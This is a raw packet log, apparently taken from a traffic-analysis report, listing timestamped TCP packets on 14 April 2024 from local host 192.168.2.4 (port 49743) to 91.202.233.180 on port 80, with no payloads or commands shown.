Apr 14, 2024 08:45:43.778633118 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778667927 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778667927 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778702974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778702974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778740883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778740883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778775930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778775930 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778811932 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778811932 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778844118 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778844118 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778877974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778877974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778911114 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778911114 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778945923 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.778945923 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779057980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779057980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779139996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779139996 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779175997 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779175997 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779211998 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779211998 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779244900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779244900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779278040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779278040 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779310942 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779310942 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779352903 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779352903 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779397011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779397011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779434919 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779434919 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779470921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779470921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779505014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779505014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779539108 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779540062 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779576063 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779576063 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779613972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779613972 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779654026 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779654026 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779689074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779689074 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779723883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779723883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779759884 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779759884 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779795885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779795885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779829025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779829025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779866934 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779867887 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779905081 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779905081 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779937983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779937983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779972076 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.779972076 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780008078 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780009031 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780049086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780049086 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780095100 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780095100 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780132055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780132055 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780179024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780179024 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780224085 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780224085 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780268908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780268908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780298948 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780298948 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780339003 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780339956 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780376911 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780376911 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780421019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780421019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780469894 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780469894 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780512094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780512094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780550003 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780550003 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780589104 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780589104 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780649900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780649900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780649900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780680895 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780680895 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780725002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780725002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780766964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780766964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780837059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780837059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780837059 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780859947 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780859947 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780903101 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780903101 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780939102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780939102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780977964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.780977964 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781014919 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781014919 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781059980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781059980 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781101942 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781101942 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781147003 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781147003 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781186104 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781186104 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781225920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781225920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781275988 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781275988 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781320095 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781320095 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781358004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781358004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781404018 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781404018 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781438112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781438112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781481028 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781481028 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781537056 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781538010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781586885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781586885 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781626940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781626940 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781666994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781666994 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781708002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781708002 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781749010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781749010 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781788111 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781788111 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781826019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781826019 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781861067 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781861067 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781903982 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781903982 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781940937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781940937 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781981945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.781981945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782021999 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782021999 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782062054 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782062054 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782100916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782100916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782119036 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782160044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782160044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782211065 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782211065 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782250881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782250881 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782291889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782291889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782342911 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782344103 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782382011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782382011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782421112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782421112 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782459974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782459974 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782497883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782497883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782536983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782536983 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782571077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782571077 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782630920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782630920 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782672882 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782672882 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782712936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782712936 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782749891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782749891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782788992 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782788992 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782824993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782824993 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782864094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782864094 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782905102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782905102 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782946110 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782946110 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782985926 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.782985926 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783026934 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783026934 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783062935 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783063889 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783101082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783101082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783139944 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783139944 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783180952 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783180952 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783224106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783224106 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783273935 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783273935 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783312082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783312082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783350945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783350945 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783401966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783401966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783440113 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783440113 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783482075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783482075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783526897 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783526897 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783565044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783565044 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783606052 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783606052 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783643961 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783643961 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783691883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783691883 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783730984 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783730984 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783773899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783773899 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783809900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783809900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783854008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783854008 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783891916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783891916 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783930063 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783930063 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783966064 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.783966064 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784003973 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784003973 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784044027 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784044981 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784084082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784084082 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784123898 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784123898 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784163952 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784163952 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784204006 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784204006 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784245014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784245014 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784290075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784290075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784342051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784342051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784384966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784384966 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784430027 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784430027 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784477949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784477949 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784517050 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784517050 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784553051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784553051 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784590960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784590960 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784632921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784632921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784671068 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784672022 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784708023 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784708023 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784734011 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784780025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784780025 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784820080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784820080 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784857035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784857035 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784897089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784897089 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784940004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784940004 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784981012 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.784981012 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785018921 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785020113 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785062075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785062075 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785101891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785101891 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785140991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785140991 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785178900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785178900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785219908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785219908 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785263062 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785263062 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785301924 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785301924 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785341978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785341978 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785389900 CEST	49743	80	192.168.2.4	91.202.233.180
Apr 14, 2024 08:45:43.785389900 CEST	49743	80	192.168.2.4	91.202.233.180
